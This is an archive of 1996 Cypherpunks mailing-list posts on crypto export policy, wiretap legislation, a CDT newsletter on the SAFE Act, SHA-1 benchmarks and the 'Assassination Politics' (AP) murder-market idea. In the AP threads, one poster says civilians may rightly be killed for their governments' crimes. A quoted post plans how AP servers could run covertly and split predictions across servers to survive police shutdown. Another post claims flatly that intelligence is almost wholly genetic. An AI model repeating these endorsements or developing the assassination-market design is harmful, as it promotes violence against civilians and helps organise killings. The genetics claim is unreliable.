qazQYJvLTVTdwarBCRtPrR0fiIRZcBPZSOvx6pVTAi7XaXcP6xO1F2yyOhxYX8a8 VOVM3As2lOE+C27adizKtsuM+ZQRzko3ZBC72v4SV82l8WCxAHefVg== =JQlW -----END PGP SIGNATURE----- From snow at smoke.suba.com Thu Sep 26 21:46:30 1996 From: snow at smoke.suba.com (snow) Date: Fri, 27 Sep 1996 12:46:30 +0800 Subject: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!] In-Reply-To: <3248DE04.5363@gte.net> Message-ID: <199609270111.UAA00449@smoke.suba.com> Mr. Thorn wrote: > Maybe, instead of having to face the (alleged) horror of AP, you could > join with other like-minded citizens and stop these atrocities from the > top down, if you have the nerve to go toe-to-toe with "the real > killers", government-style. > Remember that comment about his cousin? He is one of the "REAL KILLERS". Petro, Christopher C. petro at suba.com snow at smoke.suba.com From tcmay at got.net Thu Sep 26 21:48:53 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 27 Sep 1996 12:48:53 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: Message-ID: >Mr. May wrote: >> At 2:10 AM 9/24/96, hallam at vesuvius.ai.mit.edu wrote: >> >like Markof are somewhat more responsible. This is not going to stop me >> >from producing an op-ed piece linkiing the net libertarians to assasination >> >politics unless I hear a few more repudiations of Bell's ideas. If you >> >don't very clearly reject his murderous ideas you are going to regret it >> >just as the left regreted having the USSR or the RAF associated with them. >> I for one don't respond well to extortion threats, so write your damned >>article. > > I agree with Mr. May, and I will go so far as you call you a coward and >a thoroughly lousy human being. Now, now, let's not overreact. I named this thread, and yet I think even I was going too far. That is, I was just making the point that Phill's call for us to write denunciations or he would write an essay linking libertarians and cypherpunks to AP smacked to me of a kind of extortion. Any, I had several e-mail exchanges (in private) with Phill on this subject, and I hardly think he's a "thoroughly lousy human being." I disagree with many of his political beliefs, he no doubt disagrees with many of mine (and even "ours," collectively), and in this particular case, his "extortion" was a mistake. I say we move on. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From markm at voicenet.com Thu Sep 26 21:49:28 1996 From: markm at voicenet.com (Mark M.) Date: Fri, 27 Sep 1996 12:49:28 +0800 Subject: Newsgroup proposal: misc.anonymous In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Thu, 26 Sep 1996, Robert Hettinga wrote: > I do know that there was an alt.anonymous.messages, or some such. Haven't > looked at it lately, but I don't remember too much traffic on it... It is still active. However, there are many people who do not receive the alt.* groups and those who do may only receive newsgroups "approved" by the news admin. It is much more difficult to restrict distribution of newsgroups carried by most major news feeds. Also, some NNTP servers may expire alt groups faster than the other hierarchies which is very undesirable for message pools. Mark - -- PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMksV/CzIPc7jvyFpAQG8uAgAh0dx5o2/Ge4Myia62vUx63ENAClZG7vl pqxTDm61o9sR5aBR2uk11DqVqFVEbQQxAWzYpXd5R4OFvFKraM5OQkmJ96QRT5t6 TPaFIOI79CE0gLJ9i9/SO0ibHlsIe2/5m0/E1TpjidEYa1prVP4zSY7GmAksA5BY +tNPDvYih8eLz9P55Uwf2IorDEYAth/HMR/GcRIIrISiAGTuP67v5Mz8rSaC5CWJ XwUYqOsBatr5sLtWTl6kDuARa0dBA7giQ018N5oPS/nqJ3Ambn3MO47ff7p4jzFS RDglfGlewF/9S7kJ5R6QXTWzhxluiP+VxO6zoENpnpMV1u7ZHpFkvQ== =KYcM -----END PGP SIGNATURE----- From jamesd at echeque.com Thu Sep 26 22:03:01 1996 From: jamesd at echeque.com (James A. Donald) Date: Fri, 27 Sep 1996 13:03:01 +0800 Subject: Cuba, Iraq, AP... Message-ID: <199609270229.TAA03275@dns2.noc.best.net> At 09:08 AM 9/26/96 -0500, Phil Fraering wrote: > Shortly after the Gulf War elements in the Iraqi military tried to > overthrow Hussein; they apparently tried to co-ordinate with the U.S., who > tried to co-ordinate with Saudi Arabia, who warned Saddam that there was > going to be a coup attempt; gotta stop that Ol' power vaccuum... > > The fact that the people who performed the Bay of Pigs were enticed into > it by promised but withdrawn U.S. military support is a matter of public > record; would Castro still be in power had the United States not > (intentionally? I don't know) destroyed the core resistance against him > in that fashion? Two rulers, one of whom is a communist, have more in common than two communists, one of whom is a ruler. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jya at pipeline.com Thu Sep 26 22:03:45 1996 From: jya at pipeline.com (John Young) Date: Fri, 27 Sep 1996 13:03:45 +0800 Subject: CWD--Wiretap In the Night Message-ID: <199609270024.AAA25881@pipe2.ny2.usa.pipeline.com> Adding to the CWD wiretap alarm by Brock and Declan: The Washington Post, September 26, 1996, p. A30. Wiretaps and Money Bills [Editorial] Legislators who have pet projects but not enough support to get them passed have a way of turning desperate during the closing days of the congressional session. Their thoughts turn ineluctably to unrelated appropriations bills. Only last week, Rep. Frank Wolf used the transportation funding bill as a vehicle for usurping the courts' role in a specific domestic relations dispute. Now senators working on the Commerce, State and Justice appropriations bill have slipped in provisions relating to wiretaps that have been before the Congress for 18 months but have not been adopted. The law should not be changed by means of these stealthy riders. One of the substantive changes in the criminal laws ordered by the money committee, for example, would make it easier to obtain court orders authorizing "roving" wiretaps. This would permit putting taps on any phone a suspect might use -- including unspecified public phones -- without requiring, as the law now does, that the government show that the suspect is attempting to thwart a home or office tap by repeatedly changing phones. This may or may not be reasonable, but Congress considered and rejected it earlier this year. It shouldn't be shoved through on an appropriations bill. The committee bill also increased the number of crimes for which a wiretap can be issued, adding a list of new, relatively imprecise offenses related to terrorism such as "providing material support to terrorists" and "terrorist acts transcending national borders." Taps already are allowed for just about every major crime in which a terrorist might engage, including bombing, arson, murder, kidnapping, extortion, espionage, sabotage, treason, hostage-taking and the destruction of trains ships, aircraft and aircraft facilities. What, then, is the reason for adding these new elastic terms, which could include far less serious offenses that someone thinks might be linked to terrorism? The committees that dealt with the subject in April did not see fit to do so. Why now has the Appropriations Committee intervened? The competing values of security and privacy rights require a much better sorting out. It's best done by people who have had the benefit of relevant testimony and experience. The appropriations committees are the wrong setting to deal with such questions, which should not be presented in a take-it-or-leave-it package with the government's continued operation at stake. [End] From snow at smoke.suba.com Thu Sep 26 22:11:04 1996 From: snow at smoke.suba.com (snow) Date: Fri, 27 Sep 1996 13:11:04 +0800 Subject: AP In-Reply-To: Message-ID: <199609270203.VAA00536@smoke.suba.com> Mr. KOTM wrote: > Derek Bell writes: > > In message , "Dr.Dimitri Vulis KOTM" writes: > > >Yes, I do. > > I'm not sure what you mean here. Is it: > > 1. You hold people respobsible for what they did, not what their government > > did. (Assuming said people didn't take part in what the government did.) > > 2. You agree that the IRA could justify killing any British citizen, even if > > said citizen supported the IRA or agreed with its aims. > > 3. Something else. (Please specify.) > (Redirected to the list.) > Any British citizen, irrespective of s/he thinks about the IRA, has > benefited economically from the 800 years of pillaging and genocide > in Ireland. I see no problem if they pay with their lives for > these crimes. Likewise I see no problem if U.S. civilians pay with > their lives for their government's crimes in Iraq, even if they > happen to disapprove of these crimes. Does this mean that you are willing to pay for American Crimes, since you are obviously enjoying the results? Or that you are willing to pay for Russian and Soviet crimes? Petro, Christopher C. petro at suba.com snow at smoke.suba.com From snow at smoke.suba.com Thu Sep 26 22:14:22 1996 From: snow at smoke.suba.com (snow) Date: Fri, 27 Sep 1996 13:14:22 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: <9609251433.AB02026@cti02.citenet.net> Message-ID: <199609270146.UAA00509@smoke.suba.com> > On 25 Sep 96 at 5:59, Brian Davis wrote: > > I disagree that that will be the response, but you should be willing > > to allow one group of people to fight fire with fire. > But generally, it has been found a much better solution to fight fire > with water, and this is why I am not convinced of the ideological > effectiveness of AP, although I don't doubt it's operationnal > effectiveness at all. Having been a firefighter for about 4 years, I can say that for small fires water works quite a bit better. For larger fires (over a hundred acres or so) setting a backfire, or burning out the fuel in the direction the fire is probably going to go is a hell of a lot easier than hauling millons and millions of gallons or blood^h^h^h^h^h water. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From tcmay at got.net Thu Sep 26 22:17:55 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 27 Sep 1996 13:17:55 +0800 Subject: The Road to Crypto Anarchy In-Reply-To: <9609261727.AA03280@cti02.citenet.net> Message-ID: At 4:51 PM -0700 9/26/96, Declan McCullagh wrote: >Anonymity and nonescrowed crypto are the linchpins of AP and its more >general case, Maysian crypto anarchy. The withering of the nation-state. >Whatever you want to call it. > >To prevent it, governments will ban both. A criminal law, passed in the >wake of say a bombing this fall in Washington, DC, banning nonescrowed >crypto. (Freeh will assert he has evidence the terrorists used PGPhone.) >And another law banning online anonymity. > >What then, Mr. Bell? > Though I'm not Bell, I have some interest in this question. I believe, and have argued this for at least several years, that we are in a "race to the fork in the road." The fork in the road being essentially the point of no return, beyond which things are either pulled strongly to one end or the other. The two ends being: * a surveillance state, with restrictions on cryptography, the spending of money, the holding of various items (besides just traditional things like guns and drugs), restrictions on the dissemination of information, and of course controls on lots of other things. (For those who think this scenario is ipso facto unconstitutional, look at the many moves already in this direction. Between Supreme Court decisions allowing searches and seizures without warrants (e.g., on buses, planes, etc.), restrictions on discussion of crypto in public places (ITARs), there are a raft of "Presidential Decision Directives" and "National Security Decision Directives" which grant the Executive wide powers to seize control of telecommunications systems, computer networks, emergency systems, etc. While this is fodder for conspiracy theory supporters, it concerns many civil liberties advocates as well.) * a libertarian or anarcho-capitalist state, with people using a variety of secure and private channels to interact, exchange information, buy and sell goods and services, and communicate transnationally. The "anarchy" being the same kind of anarchy seen in so many areas of life: reading choices, eating choices (except for drug laws), this list, and so on. (For those who think this scenario is hopelessy rosy, pointing out that people "can't eat cyberspace," this is surely so. But a large fraction of "interesting" interactions are already done on the Net, or via phones, or other such mechanisms. And even if many people are not in cyberspace at all, if enough of us _are_ and are _secure_, I'll settle for that. The rest can come later.) The reason I believe there's a point of no return is this: once, for example, enough strong, encrypted, black channels are available, it will essentially be too late to crack down and stop them. Add to the mix steganographic channels, lots of bandwidth over several mechanism, and it's too late. (Take the Digital Telephony Act. It mainly covers _telephones_ (though many of us have speculated that computer networks could be covered, especially if Internet telephony catches on in a big way). There is no way the tens of thousands of individual Linux boxes and whatnot can be made to comply with DT "wiretappability." The horse is out of the barn on this one, to use yet another related metaphor.) Declan is right that each major "incident"--Oklahoma City, TWA 800, etc.--jumps us forward toward a totalitarian surveillance state. However, each new anonymous remailer, each new Web site, each new T1 or whatever link, etc., moves us forward in the direction of crypto anarchy. On the issue of terrorists, child molestors, and other Horsemen using PGP, PGPhone, etc., how else could it be? After all, use of PGP is being promoted by folks like us, and many others, and the molestors, Mafiosos, money launderers, Palestinian Neo-Intifada (the war that just started this week) sympathizers, nuclear material smugglers, and other assorted miscreants (or heroes, depending on one's outlook) are surely thinking about securing their communications. So what? After all, as we've been pointing out for years, criminals and conspirators also have locks on their doors, use curtains on their windows, keep their voices down when speaking amongst themselves in public, rent hotel rooms to plot crimes, and generally use various methods to better ensure privacy and secrecy. And yet the Constitution is pretty clear that we don't insist windows be uncurtained, conversations be "escrowed," and locks have keys "escrowed." And so on, with various of the rights enumerated in the Bill of Rights covering these situations (4th, 1st, etc.). The inevitable use of strong crypto by some criminal, perhaps even a heinous one, will be used as an argument to restrict crypto. We have to be prepared. Meanwhile, deploy as much crypto stuff as possible. (When I spoke to Stewart Baker, former chief counsel at the NSA, at the CFP in early '95, we both knew the race was on. On opposite sides, of course.) Make no mistake about it, the faster and more ubiquitously we can deploy as much strong crypto as possible (e.g., the Gilmore SWAN thing, more remailers, offshore havens, etc.), the greater the likelihood we'll win. (And winning will have some rather interesting consequences for society.) I think there's currently about an 80% chance we'll win, with maybe a 30% chance that we've already won, that we've already reached the point of no return and are on the path to crypto anarchy. --Tim May 0 We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From chad at lycos.com Thu Sep 26 22:28:02 1996 From: chad at lycos.com (Chad Dougherty) Date: Fri, 27 Sep 1996 13:28:02 +0800 Subject: ssh - How widely used? In-Reply-To: Message-ID: <324B490B.4016@lycos.com> Black Unicorn wrote: > > Does anyone know if there are MS-Dos or Mac versions of the ssh client? > How much is ssh used? > Secure shell is an amazing package. Get it immediately. There are no DOS or Mac versions, but there is one for windows. We use it here almost exclusively. -- Chad Dougherty Lycos, Inc. "The Catalog of the Internet" http://www.lycos.com Phone: (412)261-6660x226 Email: chad at lycos.com From eay at mincom.oz.au Thu Sep 26 22:28:21 1996 From: eay at mincom.oz.au (Eric Young) Date: Fri, 27 Sep 1996 13:28:21 +0800 Subject: Public domain SHA-1 in C In-Reply-To: Message-ID: On Thu, 26 Sep 1996, Steve Reid wrote: > I've written an implementation of SHA-1 in C. Public domain, so you can > hack it to your hearts content and/or use it however you want. You can > download it from > http://www.edmweb.com/steve/sha1.c ... > It's reasonably fast (the 80 core SHA operations look good) but I'm > certain that there's room for improvement. Some times for this implementation sha1 over a ~ 6 meg file, sparc 10 user time 5.23s 5.23s 5.14s Replace your 'getc() into 256 byte buffer' loop with a 'read 16k at a time' (I actually put your functions into my sha1 digest program). user time 3.79s 3.75s 3.72s Use sha1 from SSLeay. user time 2.32s 2.34s 2.24s Using gcc -O3 -fomit-frame-pointer for all builds and I left out by B_ENDIAN advisory define; all permutations produced the same digest, so the 2 SHA1 implementations conform :-). The key thing that speeds up the SSLeay sha1 is the avoidance of copying in the SHA1Update() type function. Have a look if you like (crypto/sha/sha_dgst.c. The actually SHA1 digesting on 64 bytes is probably identical. For most message digests, it appears the bigest problem is shoveling data into the algorithm fast enough. eric PS The MD2, MD5, SHA1 etc implemented in SSLeay are all stand alone functions/libraries than can be compiled and used outside of the SSLeay library build environment. This also applies to the IDEA, DES (libdes), RC2 and RC4 cipher subroutines present in the library. For those on the cipherpunks list (which I don't frequent any-more), the current version is SSLeay 0.6.4, it can be built as a shared library under unix and will build as thread safe DLL's under Windows 3.1/95/NT. It is thread safe under unix as well (only really tested under Solaris 2.5.1). http://www.psy.uq.oz.au/~ftp/Crypto ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL ftp://ftp.psy.uq.oz.au/pub/Crypto/SSLapps -- Eric Young | BOOL is tri-state according to Bill Gates. AARNet: eay at mincom.oz.au | RTFM Win32 GetMessage(). From jimbell at pacifier.com Thu Sep 26 22:32:54 1996 From: jimbell at pacifier.com (jim bell) Date: Fri, 27 Sep 1996 13:32:54 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! Message-ID: <199609270322.UAA14111@mail.pacifier.com> At 04:51 PM 9/26/96 -0700, Declan McCullagh wrote: >Anonymity and nonescrowed crypto are the linchpins of AP and its more >general case, Maysian crypto anarchy. The withering of the nation-state. >Whatever you want to call it. >To prevent it, governments will ban both. A criminal law, passed in the >wake of say a bombing this fall in Washington, DC, banning nonescrowed >crypto. (Freeh will assert he has evidence the terrorists used PGPhone.) >And another law banning online anonymity. >What then, Mr. Bell? While we should continue resist such developments, I (like many others) tend to believe that the government is going to have a great deal of difficulty implementing such restrictions, for reasons which have been discussed here ad nauseum. I happen to believe that the really crucial reason Clipper was proposed is so that it would exclude non-escrowed encryption using market forces, because they understood that banning encryption or non-escrowed encryption would be essentially impossible. Remember the VHS/Beta VCR wars? With a fairly equal market in about 1978, Beta died 10 years later because the market couldn't support two incompatible standards. It wasn't that one was dramatically better than the other, it was simply that having two standards forced the market to duplicate stocks, for the machines as well as tapes, particularly pre-recorded tapes. Notice, however, that VCR's are relatively "isolated": It doesn't really matter if you have one format and your neighbor has another, unless you want to swap tapes. But crypto telephones inherently require (in the long term) full intercompability. If you didn't have that, there'd be half a world of people you couldn't call! (This kind of situation is remeniscent of a recollection my mother has of a small town she grew up in, in which there were two competing telephone companies serving the same area, but customers of company "A" couldn't call company "B." The most popular girl in town was the daughter of a doctor, who as a consequence of his profession had telephones from both companies. That girl was constantly being called to relay information between people on opposite telephone companies!) The government understood this, and realized that the best way to derail the advent of a good crypto telephone standard was to produce one of their own, which they figured would pre-empt and kill off any competing system. It turns out that an essential element to this killing-off process is to ensure that the telephones aren't compatible, so I was a bit surprised to have to wait a long time to hear that one of the requirements for Clipper-phone approval is that they NOT co-operate with non-escrowed telephones. (I was surprised to have to WAIT to hear this, NOT that they said it eventually...) I think they realize that Clipper was their last opportunity to implement a de-facto market ban on good encryption, but it isn't working. As for a ban on anonymity I don't think that'll fly either. There are too many interactions we do today (off the 'net as well as on) which are already anonymous, even if we don't normally think of it that way. Visit a theater, pay cash, and nobody records your name, for instance. Buy groceries, pay cash. Throw coins in toll booth. Put coins in Coke machine, ride on bus, etc. It would be very hard to prohibit non-anonymous interactions on the net, with so many opportunities for unrestricted anonymity. There's even less reason to ID non-economic transactions too. Since most interactions on the 'net are not a financial transaction, there is even less reason to identify the people involved. So at the risk of being overly optimistic, I think the government isn't going to be able to pull off the kind of anti-crypto/anti-anonymity coup you describe. But nevertheless, I think that if they "progress" towards that goal against the odds, that could easily be an excellent justification for actions which you know they'll describe as "terrorism." Jim Bell jimbell at pacifier.com From pgf at acadian.net Thu Sep 26 22:34:15 1996 From: pgf at acadian.net (Phil Fraering) Date: Fri, 27 Sep 1996 13:34:15 +0800 Subject: a comment on AP vs. more peaceful resistance... Message-ID: You know, it occured to me earlier that all of this AP stuff flooding the list is overlooking one thing about cryptography: in a way, its use and dissemination represents to some people a means of nonviolent protest. Comments, anyone? Phil Fraering The above is the opinion of neither my internet pgf at acadian.net service provider nor my employer. 318/261-9649 From jamesd at echeque.com Thu Sep 26 22:38:37 1996 From: jamesd at echeque.com (James A. Donald) Date: Fri, 27 Sep 1996 13:38:37 +0800 Subject: Public Schools Message-ID: <199609270229.TAA03286@dns2.noc.best.net> Phil Fraering writes: >> > Without vouchers, you don't say anything about the intelligence of >> > your test subjects; to a _very_ large degree, intelligence isn't >> > genetic. Or Bag of shit wrote: >> That's the political correct thing to say, but do you have any >> scientific evidence to support this claim? At 11:19 PM 9/25/96 -0700, Dale Thorn wrote: > People have argued for genetic disposition to certain things, and I > think they are sometimes (most times?) confused [...] [Lots of meaningless hand waving hot air deleted] The key basic test of the power of genes is studies of identical twins raised in different families. They have near identical IQ's, and a wide range of very similar behavior. Identical twins raised in different families are more similar than identical twins raised in the same family, probably because of deliberate attempts to differentiate themselves. Except in the case of extreme environmental pressures -- starvation, neglect, and the like, genes count for just about everything, and environment for almost nothing. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From editor at cdt.org Thu Sep 26 22:50:11 1996 From: editor at cdt.org (Bob Palacios) Date: Fri, 27 Sep 1996 13:50:11 +0800 Subject: CDT Policy Post 2.34 - House Committee Holds Hearing on Crypto Bill Message-ID: ----------------------------------------------------------------------------- _____ _____ _______ / ____| __ \__ __| ____ ___ ____ __ | | | | | | | | / __ \____ / (_)______ __ / __ \____ _____/ /_ | | | | | | | | / /_/ / __ \/ / / ___/ / / / / /_/ / __ \/ ___/ __/ | |____| |__| | | | / ____/ /_/ / / / /__/ /_/ / / ____/ /_/ (__ ) /_ \_____|_____/ |_| /_/ \____/_/_/\___/\__, / /_/ \____/____/\__/ The Center for Democracy and Technology /____/ Volume 2, Number 34 ---------------------------------------------------------------------------- A briefing on public policy issues affecting civil liberties online ---------------------------------------------------------------------------- CDT POLICY POST Volume 2, Number 34 September 26, 1996 CONTENTS: (1) House Judiciary Committee Holds Hearing on Encryption Bill; NSA, DOJ Oppose Efforts to Promote Privacy Online (2) How to Subscribe/Unsubscribe to the Policy Post list (3) About CDT, contacting us ** This document may be redistributed freely with this banner intact ** Excerpts may be re-posted with permission of ** This document looks best when viewed in COURIER font ** ----------------------------------------------------------------------------- (1) HOUSE JUDICIARY COMMITTEE HOLDS HEARING ON ENCRYPTION LEGISLATION; NSA, DOJ OPPOSE CONGRESSIONAL EFFORTS TO PROMOTE PRIVACY ONLINE At a hearing before the House Judiciary Committee on Wednesday September 25, Deputy Attorney General Jamie Gorelick laid to rest any lingering suspicion that the Administration would agree to change current export controls on strong non-escrowed encryption. Equally troubling to Internet users, Administration witnesses confirmed that the Government is seeking to compel domestic Internet users towards a "voluntary" key-escrow encryption system. The hearing was called to consider the "Security and Freedom through Encryption (SAFE) Act of 1996," (H.R. 3011) sponsored by Representatives Bob Goodlatte (R-VA), Anna Eshoo (D-CA), and a bi-partisan group of more than 43 other Representatives. The bill is designed to encourage the widespread availability of strong, easy to use encryption technology by relaxing current encryption export controls. The hearing -- the first before the House in nearly 3 years -- marked the first time the House Judiciary Committee has formally considered the encryption issue, and marks an important step along the path towards passage of real encryption policy reforms. Witnesses testifying before the Committee Wednesday: * Rep. Bob Goodlatte (R-VA), chief Sponsor of the HR 3011 * Jamie Gorelick, Deputy Attorney General * William Crowell, Deputy Director, National Security Agency * William Reinsch, Under Secretary of Commerce, Export Administration * Melinda Brown, VP and General Counsel, Lotus Development Corp. * Roberta Katz, VP and General Counsel, Netscape Communications Corp. * Patricia Rippley, Managing Director, Bear Stearns & Company * Dr. Charles Deneka, Senior VP and CTO, Corning, Inc (on behalf of the National Association of Manufacturers). REPORTS OF ADMINISTRATION COMPROMISE PROVE PREMATURE Although some press reports had suggested that the Administration was poised to announce a new compromise encryption policy in testimony before the Committee, these reports proved to be premature. In response to rumors that the administration would relax export controls on 56 bit DES encryption (encryption exports are currently limited to 40 bit keys) Gorelick stated that the Administration does not support the unrestricted export of 56 bit DES. However, Gorelick did confirm that the Administration plans to propose legislation soon, and suggested such a proposal would specify the process for law enforcement to access encryption keys held by third-parties. The proposal would include new civil penalties for the unauthorized disclosure of keys. Additionally, credible sources have told CDT that the Administration's new proposal will transfer jurisdiction for encryption exports from the State Department to the Commerce Department, and that domestic law enforcement will have a role in evaluating export applications. It is also likely that the Administration will again offer to raise the export limit from 40 to 64 bit key-lengths with law enforcement access. ADMINISTRATION REITERATES PLANS TO COMPEL USE OF KEY-ESCROW DOMESTICALLY Both Gorelick and NSA Deputy Director William Crowell stressed that the Administration is not seeking to mandate the domestic use of key-escrow encryption. However, both admitted that they would like to see the widespread adoption of key-escrow systems and have initiated a broad effort to encourage industry to develop such systems. In her prepared statement, Gorelick acknowledged that criminals will at times use non-escrowed encryption to communicate with themselves, but, "we believe that if strong key recovery encryption products that will not interoperate -- at least in the long term -- with non-key recovery products are made available overseas and domestically and become part of a global KMI (Key Management Infrastructure), such products will become the worldwide standard. Under those circumstances, even criminals will be compelled to use key recovery products, because even criminals need to communicate with legitimate organizations like banks, both nationally and internationally." The administration continues to insist that their policy is "voluntary", despite the fact that their policy is clearly designed to compel the use of key-escrow domestically through continued controls on encryption exports and negotiations with foreign governments through the OECD. This apparent double-talk from the Administration cannot be the basis for sound encryption policy reform. CONGRESS, INDUSTRY REMAIN SKEPTICAL OF ADMINISTRATION'S POSITION, STAGE IS SET FOR REAL REFORM NEXT YEAR Led by Representatives Bob Goodlatte (R-VA) and Zoe Lofgren (D-CA), members of the Judiciary Committee expressed a great deal of skepticism about the Administration's proposal. Rep. Goodlatte (a chief sponsor of the SAFE bill) testified that in his view, "the chief roadblock to electronic commerce on the Internet is government regulation of encryption." Goodlatte added, "The arguments that the FBI, CIA, and NSA have given me to justify the need for a massive 'key-escrow' or as it's now called 'key-recovery' plan just don't ring true in 1996." Representative Zoe Lofgren (D-CA), expressed concern that current US encryption policy is endangering the future of the US high-technology industry. Lofgren was also highly critical of the Administrations efforts to push for a global key-escrow standards through the OECD. Lofgren said: "The Deputy Attorney General also argues that the United States, combined with its allies, can control the world encryption market and can coordinate the implementation of an international 'key-escrow' regime. Notwithstanding the absence of any demonstrable progress towards such an agreement, the aspirations for a comprehensive global key escrow scheme ignore the undeniable power of market demand for cryptographic products that do not incorporate any form of escrow. The customers that purchase encryption products DO NOT WANT products with escrowed keys, and if use suppliers are forbidden to supply these products, then someone undoubtedly will. Whatever hopes we may have for an international system of key escrow, we will never achieve 100 percent participation, and those who do not participate will profit heavily at our expense." (emphasis in original) Several other members of the Committee, including Reps. Sonny Bono (R-CA), John Conyers (D-MI), Robert Scott (D-VA), and John Bryant (D-TX) echoed these concerns in their questions of the Administration witnesses. The fact that Committee members from both parties expressed deep skepticism of the Administration's proposal is an extremely encouraging preview of the debate when Congress resumes in January. Finally, witnesses testifying on behalf of the software industry, the securities industry and users of encryption technology all expressed support for the SAFE bill, and argued that current policy threatens the competitiveness of US businesses and Internet users. NEXT STEPS Time is running out in a busy election year Congressional calendar, and chances of passage of encryption reform legislation in either the House or Senate before the end of the current term are slim. However, the stage is clearly set for an all out battle when Congress returns in January, and support for encryption policy is clearly growing in Congress. Forty-five Republican and Democratic members of the House have signed on as co-sponsors of the Security and Freedom through Encryption Act (SAFE). The Burns/Leahy "Promotion of Commerce Online in the Digital Era (ProCODE) Act also enjoys broad bi-partisan support in the Senate. Meanwhile, the Administration continues to offer more of the same -- continued reliance on export controls while pushing for a global key-escrow standard. The stage is set, but the battle over U.S. encryption policy reform is only just beginning. CDT will continue to work to educate policy makers and the public on the importance of encryption policy reform. Over the next several months, stay tuned for more information on what you can do to help protect privacy and security on the Internet. ----------------------------------------------------------------------- (2) SUBSCRIPTION INFORMATION Be sure you are up to date on the latest public policy issues affecting civil liberties online and how they will affect you! Subscribe to the CDT Policy Post news distribution list. CDT Policy Posts, the regular news publication of the Center For Democracy and Technology, are received by nearly 10,000 Internet users, industry leaders, policy makers and activists, and have become the leading source for information about critical free speech and privacy issues affecting the Internet and other interactive communications media. To subscribe to CDT's Policy Post list, send mail to policy-posts-request at cdt.org with a subject: subscribe policy-posts If you ever wish to remove yourself from the list, send mail to the above address with a subject of: unsubscribe policy-posts ----------------------------------------------------------------------- (3) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US The Center for Democracy and Technology is a non-profit public interest organization based in Washington, DC. The Center's mission is to develop and advocate public policies that advance democratic values and constitutional civil liberties in new computer and communications technologies. Contacting us: General information: info at cdt.org World Wide Web: URL:http://www.cdt.org/ FTP URL:ftp://ftp.cdt.org/pub/cdt/ Snail Mail: The Center for Democracy and Technology 1634 Eye Street NW * Suite 1100 * Washington, DC 20006 (v) +1.202.637.9800 * (f) +1.202.637.0968 ----------------------------------------------------------------------- End Policy Post 2.34 9/26/96 ----------------------------------------------------------------------- From declan at eff.org Thu Sep 26 22:56:54 1996 From: declan at eff.org (Declan McCullagh) Date: Fri, 27 Sep 1996 13:56:54 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: <9609261727.AA03280@cti02.citenet.net> Message-ID: Anonymity and nonescrowed crypto are the linchpins of AP and its more general case, Maysian crypto anarchy. The withering of the nation-state. Whatever you want to call it. To prevent it, governments will ban both. A criminal law, passed in the wake of say a bombing this fall in Washington, DC, banning nonescrowed crypto. (Freeh will assert he has evidence the terrorists used PGPhone.) And another law banning online anonymity. What then, Mr. Bell? -Declan On Thu, 26 Sep 1996, Jean-Francois Avon wrote: > On 26 Sep 96 at 10:49, Brian Davis wrote: > > > If by "operation effectiveness" you mean some people will be killed, > > I agree. I also agree with the fire/water comment (maybe in more > > ways than one!); my comment related to my belief that AP-supporters > > shouldn't complain about especially draconian measures taken against > > them by governments, given their modus operandi. > > I don't think that any of them will complain because they understand > the nature of it. I think that Jim Bell (forgive me Jim...:) view > that there will be only limited retaliation from government is not > guaranteed at all. As I said somewhere previously, the whole thing > will depend on how the authorities view AP as (non-) attackable. > > Here is the post I wrote earlier: > > ------- earlier post ------- > > jim bell recently wrote: > > > Local police action against an AP organization would, of course, be > > deterred by the prospect of naming anybody who would go after it, > > and soliciting donations against them. > > I don't agree here. It would all be a matter of timing, unless the > number of AP servers would be sprouting out faster than police forces > would be able to destroy them. You have to realize that if the money > is seized, noboby will be willing to make a hit since the odds of > being paid are not too good. Just play the game "Command and Conquer" > for a while and you'll see. Money is fuel. Don't run off of it! > > For that reason, I think that any AP server, *at the introduction of > the concept* would have to be a covert operation. Servers could come out in > public light when their number be large enough to warrant a > strike on anybody trying to eliminate them. Same for the > publication of the name of the individuals operating the server. > > To me, this seems obvious. Comments? > > To go on along that line, I had the idea that a specific piece of > software, a bit like Private Idaho, that would chain remailers but > that would be specifically designed to handle predictions, would > have be designed. > > (Pardon my ignorance of the net here) > > The server need not to be a unique address. Actually, the > prediction and any accompanying documents could be splitted a la > Secure Split, and sent to N differents servers, M ( would be required to re-assemble the original prediction. This > assures that if one gets closed, the other can rebuild the message. > > If thoses servers were set up on *large* machines servicing tens of > thousands of messages a day, preferably located at a busy remailer > location, any exchange of information between them to rebuild the > prediction at a central location would not be easy to track by any > govt. > > Comments? > > ----- end of earlier post ----- > Jean-Francois Avon, Montreal QC Canada > DePompadour, Societe d'Importation Ltee > Finest Limoges porcelain and crystal > JFA Technologies, R&D consultant > physicists and engineers, LabView 